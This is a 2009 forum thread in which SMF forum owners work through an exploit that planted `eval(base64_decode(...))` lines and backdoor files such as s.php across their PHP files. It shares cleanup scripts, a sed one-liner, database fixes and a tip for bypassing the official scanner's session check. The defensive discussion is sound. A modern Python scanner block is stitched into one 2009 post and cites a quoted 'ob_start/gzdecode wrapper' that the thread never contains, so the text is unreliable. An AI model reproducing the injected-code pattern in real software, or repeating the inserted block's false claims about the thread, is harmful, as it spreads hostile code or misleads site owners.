Sorry to be a pain
Title: Re: Hacked, script injection
Post by: mycousinvinny on May 21, 2009, 08:30:30 AM
mycousinvinny, make sure to check all php files on line 1 for a string of "base64_decode()"

If you have that on ANY file, please let us know and we will do what we can to help.

Thanks Jblaze. In layman's terms can you tell me how I do that??  I don't know Jack about where these files are; thanks for your help. Also I have updated to 1.1.9 but had 3 errors; my forum appears to be functioning properly.

Vinny
Title: Re: Hacked, script injection
Post by: mghq on May 21, 2009, 05:24:39 PM
Hi,

My forum has been hacked today by krisbarto; he came online for about 1 minute and uploaded an image, a very small dot, but I only found this an hour later. I searched the name and found this thread. I have banned him, removed the image from the database and attachments folder and I am currently going through all php files; so far I have not found a line at the top but I have found this in the gallery php file:

die(base64_decode('UG93ZXJlZCBieSBHYWxsZXJ5IEZvciBTTUYgIG1hZGUgYnkgdmJnYW1lcjQ1IGh0dHA6Ly93d3cuc21maGFja3MuY29t'));

Is that meant to be there ? I don't really know what i'm doing this is all new to me.

Thank you for any help

That one is safe I place that for copyright reasons says
Powered by Gallery For SMF  made by vbgamer45 http://www.smfhacks.com

I was going to say that too
Title: Re: Hacked, script injection
Post by: Broken Arrow on May 21, 2009, 07:45:02 PM
updated mine, thanks guys!
Title: Re: Hacked, script injection
Post by: massillon on May 22, 2009, 12:43:30 AM
My god...  I should have come here sooner.

I have been battling this for weeks and have started from scratch twice... 

The only thing I have saved was the avatars...  darn it, I was reinfecting myself and did not even know it.

I have to be honest, this is a nasty one.  I first noticed it a few weeks ago when I logged in from my blackberry and got nothing but spam...  I quickly found a computer and logged in to shut my forum down but saw it was doing nothing to the regular page so I figured it was just in the mobile version...  then my forum kept crashing because my error log was overflowing the database.

One quick question.  Does the 1.1.9 patch fix the problem or just prevent it from reoccurring once you fix it?
Title: Re: Hacked, script injection
Post by: massillon on May 22, 2009, 01:04:21 AM
Wow...  I am going through all of my php files and this little bugger is in every single one of them.

This is going to be a loooooooong night.
Title: Re: Hacked, script injection
Post by: massillon on May 22, 2009, 01:18:59 AM
Interestingly enough, there have been two files without this string so far...

notify.php and reminder.php
Title: Re: Hacked, script injection
Post by: Eleseon on May 22, 2009, 01:21:58 AM
What a lovely way to keep me awake tonight. First I get Anon-attacked, and then this.

I deleted all of the funky php from the forum itself...but the rest of my site? *cries* It's going to take me forever.

I'm really glad this thread was here though, to walk me through all of this. Thank you all, I really appreciated all of this. ^_^
Title: Re: Hacked, script injection
Post by: massillon on May 22, 2009, 01:35:37 AM
So let me get this right... unless I get it from every php file it will just come back to the rest again?
Title: Re: Hacked, script injection
Post by: ldk on May 22, 2009, 01:40:47 AM
So let me get this right... unless I get it from every php file it will just come back to the rest again?

Nope. You need to do all of these three things:

1. delete any avatars with the malicious code in them

2. delete theme_dir entries in your DBPREFIX_themes table that are set like so:
./attachments/avatar_xxxxx.gif\0

3. upgrade to 1.1.9

and then all the crap you take out of your php files won't come back.
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 22, 2009, 01:41:13 AM
Probable though, that infected files on the server may alone do damage..
Title: Re: Hacked, script injection
Post by: massillon on May 22, 2009, 01:42:12 AM
So let me get this right... unless I get it from every php file it will just come back to the rest again?

Nope. You need to do all of these three things:

1. delete any avatars with the malicious code in them

2. delete theme_dir entries in your DBPREFIX_themes table that are set like so:
./attachments/avatar_xxxxx.gif\0

3. upgrade to 1.1.9

and then all the crap you take out of your php files won't come back.

on it!

1. done
2. working on it
3. done
Title: Re: Hacked, script injection
Post by: JBlaze on May 22, 2009, 01:45:40 AM
Also, there are other files named like style.css.php and s.php (not normal SMF files) scattered throughout.

Make sure to delete those as well as any files named with random sequences of numbers and letter.
Title: Re: Hacked, script injection
Post by: massillon on May 22, 2009, 01:51:39 AM
Did not find anything like that in my DB.

Title: Re: Hacked, script injection
Post by: romper on May 22, 2009, 09:09:00 AM
So let me get this right... unless I get it from every php file it will just come back to the rest again?

Nope. You need to do all of these three things:

1. delete any avatars with the malicious code in them

2. delete theme_dir entries in your DBPREFIX_themes table that are set like so:
./attachments/avatar_xxxxx.gif\0

3. upgrade to 1.1.9

and then all the crap you take out of your php files won't come back.

1. I deleted all avatars
2. Can I get help with these, more specifically?
3. Done
4. THX!
Title: Re: Hacked, script injection
Post by: romper on May 22, 2009, 09:26:17 AM
Just to mention, I realized now that yesterday, after I deleted kris and removed all avatars and upgraded to 1.1.9, it worked, but today it doesn't, and nothing I upload shows on my server in the attachment dir. So obviously I didn't clean everything. Please help
Title: Re: Hacked, script injection
Post by: ConquerorOfMankind on May 22, 2009, 10:31:51 AM
Quote
and nothing I upload shows on my server in attachment dir.

Did you set chmod rights correctly?
Title: Re: Hacked, script injection
Post by: romper on May 22, 2009, 12:36:33 PM
Quote
and nothing I upload shows on my server in attachment dir.

Did you set chmod rights correctly?

Yes....It worked yesterday.
Title: Re: Hacked, script injection
Post by: romper on May 22, 2009, 01:13:45 PM
I just wanted to delete SMF gallery and the uninstall failed in:
4.     Execute Modification     ./Sources/ManagePermissions.php     Test failed
5.    Execute Modification    ./Themes/default/index.template.php    Test failed

So I checked those 2 files, and saw this:
<?php /**/eval(base64_decode('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')); ?>

But even when I delete that I can't uninstall gallery without test failed.
Title: Re: Hacked, script injection
Post by: Kindred on May 22, 2009, 01:28:17 PM
the failure of a mod to install has no bearing on the hack...     the test failed suggests that something has changed the code that the mod is looking for so that it can not automatically install. You will have to manually install the mod into those files.

Title: Re: Hacked, script injection
Post by: romper on May 22, 2009, 01:41:38 PM
Quote
The failure of a mod to install has no bearing on the hack... The "test failed" suggests that something has changed the code that the mod is looking for, so that it cannot automatically install. You will have to manually install the mod into those files.

I'm trying to uninstall... The problem is that I see the code (already mentioned here... eval base64... and so on) in more files, and I have a lot of mods installed. I was hoping that 1.1.9 would fix that, but now I'm not sure what to do?
Start deleting those lines manually? Leave everything? Restore the base? Delete everything and start over? (hope not)
Title: Re: Hacked, script injection
Post by: Kindred on May 22, 2009, 02:12:02 PM
If you have a backup from before the attack, then use that... (if you don't, then I suggest that you start keeping one)

Otherwise, take the full install package of SMF 1.1.9, save the Settings.php file on your local computer and delete all PHP files from your forum directories. Then reload the forum files using the install package, delete the install files and copy back your saved version of Settings.php (after making sure that it is clean).

You now have your forum reset to a clean state and you can re-apply mods as needed.
Title: Re: Hacked, script injection
Post by: ellion on May 22, 2009, 05:03:43 PM
I just went through my DB to check for theme_dir entries and I found the following entries.
Code: [Select]
 
249  32  theme_dir  ./attachments/avatar_249.gif\0
280  32  theme_dir  ./attachments/avatar_280.jpg\0
488  32  theme_dir  ./attachments/avatar_488.jpg\0
The first column of numbers is the member ID; ID 488 is kris barteo.

Should I delete these entries?
Title: Re: Hacked, script injection
Post by: Sarge on May 22, 2009, 05:14:48 PM
What are the names for the other IDs?
Title: Re: Hacked, script injection
Post by: WHK on May 22, 2009, 07:21:44 PM
More bugs for smf 1.1.9
http://foro.elhacker.net/nivel_web/bug_en_smf_118_y_119-t255613.0.html

Att, WHK.
Title: Re: Hacked, script injection
Post by: JBlaze on May 22, 2009, 07:32:15 PM
Quote
More bugs for smf 1.1.9
http://foro.elhacker.net/nivel_web/bug_en_smf_118_y_119-t255613.0.html

Att, WHK.

Heh, my topic is linked :P
Title: Re: Hacked, script injection
Post by: Kindred on May 22, 2009, 07:47:50 PM
OK... rather than post a link to a Spanish forum with a relatively useless comment, care to tell us what they claim the bug in 1.1.9 is?
Title: Re: Hacked, script injection
Post by: FinsandFur on May 24, 2009, 02:53:58 AM
I've got another forum that he hit.
I scanned through most of what you folks got here, but couldn't bring myself to read all 17 pages :-\

Basically, I'm just bringing ya's some more info to the table.

The said forum was for a client I just took over the maintenance duties last week.
They were on 1.1.7 at the time of the hack, which was Jan 18th, '09.
The path he chose was relatively easy to follow by looking at last-modified dates through SSH.

He also added a php file to the Packages directory titled "tvax.php" that was heavily infected. I DO have that file zipped if anyone wants to analyze it.

Title: Re: Hacked, script injection
Post by: Daniel15 on May 24, 2009, 05:28:40 AM
Quote
I'm a victim too, and took another route to preventing future attacks. First, I didn't have backups, so I downloaded and cleaned the files using this Linux bash script with base64_decode as the search term. The script deletes that line entirely, leaving no white space:
Code: [Select]
#!/bin/bash
# Recursively find PHP files under the given directory and delete every line
# that contains base64_decode. This removes the whole line, so any legitimate
# line using base64_decode() is lost as well (see the note below).
find /directory_name -type f -name '*.php' -print0 | while IFS= read -r -d '' FILE
do
    sed -i '/base64_decode/ d' "$FILE"
done
This cleaned everything recursively, but I did have to replace one file that had a legitimate line with the search term in it (can't remember which one, but you'll know from the error it generates). Then I uploaded the clean files and was back in business. Took about an hour to do all this.

Thanks for the script, saved me a whole heap of time cleaning an infected forum. :)
Now to clean the random junk it left behind >_<
Title: Re: Hacked, script injection
Post by: agridoc on May 24, 2009, 05:52:36 AM
Although I did some work with SSH commands, I finally cleaned my files by creating a zip file with SSH, containing all PHP files in my domain
Code: [Select]
zip -R filename '*.php'
Then I cleaned them with Search & Replace Master (http://www.knowlesys.com/software/search-and-replace-master/), an excellent freeware tool, I really liked it, then uploaded them back to my site by FTP.

It's useful to have a file with the injected code. See here how to use it for finding the directory with style.css.php and s.php
http://www.simplemachines.org/community/index.php?topic=307717.msg2060807#msg2060807
Title: Re: Hacked, script injection
Post by: Ratiomaster on May 24, 2009, 02:09:52 PM
I've made a PHP script that will clean all infected files on your server (attached).
Just put it in the root directory and it will search and remove the junk line from all PHP files recursively.

Btw, are there other problems caused by this hack? Like, does it install some backdoors that need to be removed as well?
Title: Re: Hacked, script injection
Post by: Dzonny on May 25, 2009, 02:57:02 PM
Really, that is very good work Ratiomaster...
Anyone fixed forum with this tool ??
Title: Re: Hacked, script injection
Post by: romper on May 25, 2009, 04:48:29 PM
Quote
I've made a PHP script that will clean all infected files on your server (attached).
Just put it in the root directory and it will search and remove the junk line from all PHP files recursively.

Btw, are there other problems caused by this hack? Like, does it install some backdoors that need to be removed as well?

Greattt! I'm clean now, but this will be on my reserves!!!
Title: Re: Hacked, script injection
Post by: aly22 on May 25, 2009, 06:50:28 PM
If I already deleted user kristabero, how do I know if the avatar has been left behind, please?
Title: Re: Hacked, script injection
Post by: aly22 on May 25, 2009, 10:44:34 PM
Anyone tried the cleanup script? I don't want to be skeptical, and it scans clean ... but with all I've cleaned up manually over the past week, I am timid of installing/running anything without some assurance it works. Thx
Title: Re: Hacked, script injection
Post by: Ratiomaster on May 26, 2009, 10:27:02 AM
I used it on my own server :)
Because this hack infects not only the PHP in the forum directory, but also all PHP files in other directories up to root, it was not realistic for me to try to clean it by hand.
I've attached cleanup_test.php. This file will only scan all PHP files and report infected files with an "INFECTED" line, without actually removing anything. So you can see if you are clean or not.
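Both the sed one-liner posted above and the scan/clean pair described in this post target the same one-line injection. As an added example (not code from this thread, from Ratiomaster's attachment or from SMF), here is the same idea in Python, with a dry-run report like cleanup_test.php and a removal mode that strips only the injected `eval(base64_decode(...))` statement rather than the whole line, so a legitimate `base64_decode()` call elsewhere in the file survives. It also decodes each captured payload so you can see what was planted. The sample forum tree and its payload are constructed inside the block; the file extensions scanned are an assumption.

```python
import base64
import os
import re
import tempfile

# Pattern for the injected statement quoted in this thread:
#     <?php /**/eval(base64_decode('....')); ?>
# The base64 body is captured so the payload can be decoded and inspected
# rather than trusted blindly.
INJECT_RE = re.compile(
    r"<\?php\s*/\*\*/\s*eval\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)\s*;\s*\?>"
)


def decode_payload(b64):
    """Decode the captured base64 body; returns None if it is not valid base64."""
    try:
        return base64.b64decode(b64, validate=True).decode("latin-1")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def find_injections(text):
    """Return a list of decoded payloads, one per injected statement in text."""
    return [decode_payload(m.group(1)) for m in INJECT_RE.finditer(text)]


def clean_text(text):
    """Strip only the injected statement; the rest of the line, and any
    legitimate base64_decode() call elsewhere, is left untouched."""
    return INJECT_RE.sub("", text)


def scan_tree(root, exts=(".php", ".php3", ".phtml"), remove=False):
    """Walk root; return {path: [payloads]} for infected files. With remove=True,
    rewrite those files in place with the injected statement removed."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                text = fh.read().decode("latin-1")   # byte-preserving round trip
            payloads = find_injections(text)
            if not payloads:
                continue
            report[path] = payloads
            if remove:
                with open(path, "wb") as fh:
                    fh.write(clean_text(text).encode("latin-1"))
    return report


# --- constructed sample data, not taken from any real compromised site -------
SAMPLE_PAYLOAD = 'echo "constructed sample payload";'
INJECTED_PREFIX = "<?php /**/eval(base64_decode('%s')); ?>" % base64.b64encode(
    SAMPLE_PAYLOAD.encode()).decode()


def build_sample_tree():
    """Create a temp forum tree: one infected file (injection prepended to the
    first line, as in the thread) and one clean file that legitimately calls
    base64_decode(), which a line-deleting sed would wrongly destroy."""
    root = tempfile.mkdtemp(prefix="smf_scan_")
    os.makedirs(os.path.join(root, "Sources"))
    with open(os.path.join(root, "Sources", "ManagePermissions.php"), "w") as fh:
        fh.write(INJECTED_PREFIX + "<?php\n// legitimate code follows\n")
    with open(os.path.join(root, "Sources", "Subs.php"), "w") as fh:
        fh.write("<?php\n$x = base64_decode($y); // legitimate use, must survive\n")
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for path, payloads in scan_tree(root).items():   # dry run, like cleanup_test.php
        print("INFECTED", path, "->", payloads)
    scan_tree(root, remove=True)                      # actual cleanup
    print("after cleanup:", scan_tree(root))          # empty dict when clean
```

Run it first without `remove=True` and read the decoded payloads: if any of them does more than the ob_start/gzdecode wrapper quoted at the top of this thread, or if files outside the forum directory are flagged, you have evidence of something the one-line cleaners were never meant to handle, and a restore from a clean backup is the safer route.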
Title: Re: Hacked, script injection
Post by: Ratiomaster on May 26, 2009, 10:46:07 AM
Also, I just noticed that Simple Machines released an official clean-up tool in this thread:
http://www.simplemachines.org/community/index.php?topic=313201.0

Keep in mind that it only cleans files in your forum directory. If you want to clean the whole server, then you need to copy
Settings.php, SSI.php and kb_scan.php to your root folder.
And then type in the browser www.yoursite.com/kb_scan.php and wait a few minutes :)

I was clean also according to official tool, so i feel much safer now :)

Good luck.
Title: Re: Hacked, script injection
Post by: Ratiomaster on May 26, 2009, 11:07:39 AM
That's actually an oversight. The whole site is compromised by the attack, not only the forum. I hope they fix it soon.
You can still avoid that check by running the script in the same window (same session) after you have logged into your forum, and then manually changing the URL.

Title: Re: Hacked, script injection
Post by: Dzonny on May 26, 2009, 11:12:21 AM
Thanks for info, this is great tool, i'm glad this is released too.. :D
Title: Re: Hacked, script injection
Post by: aly22 on May 26, 2009, 11:20:47 AM
I ran cleanup_test.php and it just lists a ton of files. I see no "INFECTED" tag on them, so does that mean I'm clean or did I do something wrong?
Title: Re: Hacked, script injection
Post by: Ratiomaster on May 26, 2009, 11:55:19 AM
Quote
What's cool about Ratiomaster's script is that it can catch any "base64_decode" injection in all directories - am I correct?

You can drop it in any directory and it will search it and all subdirectories.

The official tool is more user friendly and comprehensive; it looks in 'php', 'phtml' and 'php3' files for the pattern. But it requires that you drop the tool in your forum folder.
It also tries to look for something in the database. It didn't find anything on my site, and that is slightly suspicious, because I didn't touch the database, and if the exploit does change the database, then it means the backdoor is still there...
I don't suggest running the official tool on the whole site (on the forum only it's probably OK), because it can corrupt one of your valid files.
I'd wait until the official team fixes those issues first.
Title: Re: Hacked, script injection
Post by: Ratiomaster on May 26, 2009, 11:59:26 AM
Quote
I ran cleanup_test.php and it just lists a ton of files. I see no "INFECTED" tag on them, so does that mean I'm clean or did I do something wrong?

If you didn't manually clean up infections, then it definitely means you're not infected. If you cleaned them up before running either tool, it just confirms that you don't have the most obvious traces of it. But considering the sophistication of the exploit, I'm afraid that it installed some backdoors which neither of the tools really cleans.
Title: Re: Hacked, script injection
Post by: glennk on May 26, 2009, 03:17:16 PM
Hi There,

There are quite a lot of topics on this and a lot of posts here. I don't really know where to start. I have (did have) a forum member called Krisbarteo. I have now banned him. I have been experiencing problems for a few weeks. My forum members tell me that their antivirus is warning of problems on the site. Namely

exploit javascript obfuscation type(501)

j.s.cruzer-c (trj) trojan horse

It appears to have affected a lot of things, even the spellchecker.

It apparently is also present in my Coppermine gallery and my WordPress sites, which are all on the same domain in subfolders.

Can someone advise on what to do. Do I overwrite every file or is there a simpler solution here?

Many thanks for your time - Glenn
Title: Re: Hacked, script injection
Post by: Antechinus on May 26, 2009, 09:17:28 PM
Grab the cleanup script and run it. http://www.simplemachines.org/community/index.php?topic=313201.0
This one has been looked at by the SMF team. As far as I know Ratiomaster's script has not, so at the moment I'm not in a position to recommend it. However if other members are getting good results with it this is a good sign, and we may be able to incorporate the best features of both scripts in one tool. 
Title: Re: Hacked, script injection
Post by: Fustrate on May 27, 2009, 12:05:17 AM
FYI, you can change the path to SSI.php at the top of the file in order to use it from a lower directory.

Both Ratiomaster's and my scripts do the same thing for the infected files, but kb_scan.php also scans the database and looks for files such as those that could be added by the exploit. By what I see in cleanup.php, it's safe and should do just as well for any infected files :)
Title: Re: Hacked, script injection
Post by: Anhinga on May 27, 2009, 12:05:54 AM
I'm a member of a forum running SMF 1.1.4 where users can upload their own avatars, and krisbarteo is registered there, although as far as I can tell he hasn't attacked it yet. I hope I can get the administrator to delete this guy's account and update the forum.

The forum is http://tyrantkingforums.net/ . I don't see any spam links in the forum's source code; is there anything else I should look for to determine whether he's used this exploit there?
Title: Re: Hacked, script injection
Post by: Fustrate on May 27, 2009, 12:06:49 AM
You should point them towards http://www.simplemachines.org/community/index.php?topic=313201.0 so that they can check everything themselves :)
Title: Re: Hacked, script injection
Post by: kassie on June 01, 2009, 05:06:24 AM
Quote
All the php files on my site have been injected with Base64-encoded text that translates to
Quote
Do you have a recent member called "krisbarteo"?
If you do, could you answer these couple of questions:

- Did he upload an avatar?
- Do you use the attachment folder for avatars, or some other custom folder?
- What other software than SMF are you running on your server?

Then please delete that user, and his avatar from your forum.

Hi, I had this member on my forum, so I deleted them, and all the code that was at the top of the site when going into my profile to change themes is now gone. I left my computer for an hour and now I can't see my site any more. I get this message.

"Not Found

The requested URL /smf/index.php was not found on this server."

I've gone into cPanel and all the files are there. I don't have a backup either. What can I do?
Title: Re: Hacked, script injection
Post by: JBlaze on June 01, 2009, 05:08:05 AM
Have you tried using the exploit utility released especially for this hack?

http://www.simplemachines.org/community/index.php?topic=313201.0
Title: Re: Hacked, script injection
Post by: kassie on June 01, 2009, 05:26:26 AM
No I haven't, thanks.
Oh can I use that with 1.1.9? I had updated before knowing about this.
Title: Re: Hacked, script injection
Post by: JBlaze on June 01, 2009, 05:30:06 AM
Yes, you can use it on any version from the 1.0.x series, 1.1.x series as well as 2.0
Title: Re: Hacked, script injection
Post by: kassie on June 01, 2009, 05:30:51 AM
Thank you JBlaze :)
Title: Re: Hacked, script injection
Post by: H on June 01, 2009, 07:57:30 AM
The hack that caused the issue prompting this topic has been fixed in SMF 1.1.9 or 2.0 RC1-1

Release announcement: http://www.simplemachines.org/community/index.php?topic=311899.0
Confirm that your site has not been exploited with our scanning tool: http://www.simplemachines.org/community/index.php?topic=313201.0

If you have any further questions or concerns please start a new topic so that we can track individual issues.

Thanks